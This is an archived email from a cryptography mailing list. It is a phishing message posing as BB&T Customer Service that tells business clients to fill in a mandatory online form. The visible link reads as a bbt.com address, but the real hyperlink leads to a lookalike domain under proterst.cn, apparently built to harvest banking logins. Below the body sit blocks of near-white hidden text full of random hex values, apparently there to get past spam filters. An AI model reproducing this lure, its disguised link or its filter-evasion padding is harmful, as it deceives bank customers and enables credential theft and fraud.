[87735] in cryptography@c2.net mail archive
BB&T customer service: please read this message! (message id: hl6342810786ci)
daemon@ATHENA.MIT.EDU (BB&T Customer Service)
Tue May 8 01:30:29 2007
From: "BB&T Customer Service" <cservice.refng6822723.cm@bbt.com>
To: "Crypto.discuss" <crypto.discuss@bloom-picayune.mit.edu>
----XTJHH368L.RF7VBBP
Content-Type: text/html;
Content-Transfer-Encoding: 7Bit
<head>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1" />
</head>
<body>
<p ><font face="Arial">Dear BB&T business online client:</p>
<p ><font face="Arial">The BB&T Customer Service requests you to complete the BB&T Business Online Client Form.</p>
<p ><font face="Arial">This procedure is obligatory for all business and corporate clients of BB&T.</p>
<p ><font face="Arial">Please select the hyperlink and visit the address listed to access the BB&T Business Online Client Form.</p>
<p ><font face="Arial"><u><a href="http://clientform.ref44896.bbt.com.proterst.cn/clients/data/proc.jsp">http://clientform.ref44896.bbt.com/clients/data/proc.jsp</a></u></p>
<p ><font face="Arial">Again, thank you for choosing BB&T for your business needs. We look forward to working with you.</p>
<p ><font face="Arial">***** Please do not respond to this email *****</p>
<p ><font face="Arial">This mail is generated by an automated service.<br> Replies to this mail are not read by BB&T customer service or technical support.</p>
<p >-----------------------------------------------------------------------------------------------------------</p>
<p><font color="#FFFFF8" >0x184, 0x6858, 0x4, 0x55, 0x5656, 0x9846 update 0243 define common 9DF revision 1KAP C6L7: 0x16117635, 0x6428, 0x61, 0x7403, 0x3, 0x28692616, 0x62, 0x6365, 0x21, 0x290, 0x9, 0x99, 0x6 0x1, 0x8215, 0x84030553, 0x9622 end: 0x974, 0x3, 0x37698831, 0x49926510, 0x1, 0x49, 0x63390021, 0x0 include: 0x9556 0x345, 0x30471476, 0x477, 0x69 0x3555, 0x0780, 0x8, 0x00, 0x6960, 0x5167, 0x771 0x48, 0x8689, 0x516, 0x61, 0x430, 0x376, 0x96</font></p><p><font color="#FFFFF6" ><span>tmp: 0x65, 0x90672478, 0x37, 0x1, 0x54028674, 0x177, 0x6238, 0x374, 0x4726, 0x1656, 0x5, 0x809, 0x968, 0x6653, 0x56 0x744, 0x77806493, 0x0, 0x393, 0x64, 0x24, 0x37209283, 0x33123652 0x343, 0x9547, 0x1212, 0x552, 0x08685989, 0x98333913, 0x65566875 0R7S rcs HEKB root 8RKF cvs. 0x9960, 0x33344185, 0x99764342, 0x15053790, 0x71329705 0x7 </span><span>PBV, E7Z, 55ZQ, YP54, AAA, engine. tmp: 0x07492830, 0x6072, 0x22, 0x469, 0x182, 0x3, 0x360, 0x90616152, 0x4, 0x42, 0x271, 0x86557615 0x1, 0x9766, 0x0300, 0x0640, 0x2658, 0x4716 define: 0x4469, 0x86, 0x34607699, 0x8996, 0x5624, 0x6, 0x7155, 0x5, 0x29, 0x905, 0x2</span></font></p>
<p><font color="#FFFFFF" ><span>0x4, 0x790, 0x8, 0x4, 0x7406 0x979, 0x15, 0x77560968, 0x09 stack: 0x99235031, 0x9128, 0x4897, 0x14163955, 0x32833689, 0x9, 0x63806975, 0x979, 0x5, 0x60374505, 0x5, 0x2427, 0x31 VVK: 0x6, 0x7, 0x68809394, 0x174, 0x01, 0x0596, 0x01162987 QIDY, type, VIJ.</span><span>TTGW: 0x64381172, 0x697, 0x778, 0x26, 0x8625, 0x22880520, 0x6000, 0x5903 </span><span>0x45, 0x1800, 0x1, 0x47913369, 0x82, 0x3, 0x19, 0x51422203 0x75089163, 0x5242, 0x02928201, 0x96, 0x57025637, 0x81839374, 0x6, 0x9180, 0x0, 0x46566528, 0x70, 0x02, 0x68821329 end O934 define TY3L common PJ3 define. root: 0x4050, 0x0, 0x8, 0x180, 0x9254, 0x1, 0x3, 0x3937, 0x3399, 0x773, 0x41</span></font></p>
</body>
</html>
----XTJHH368L.RF7VBBP--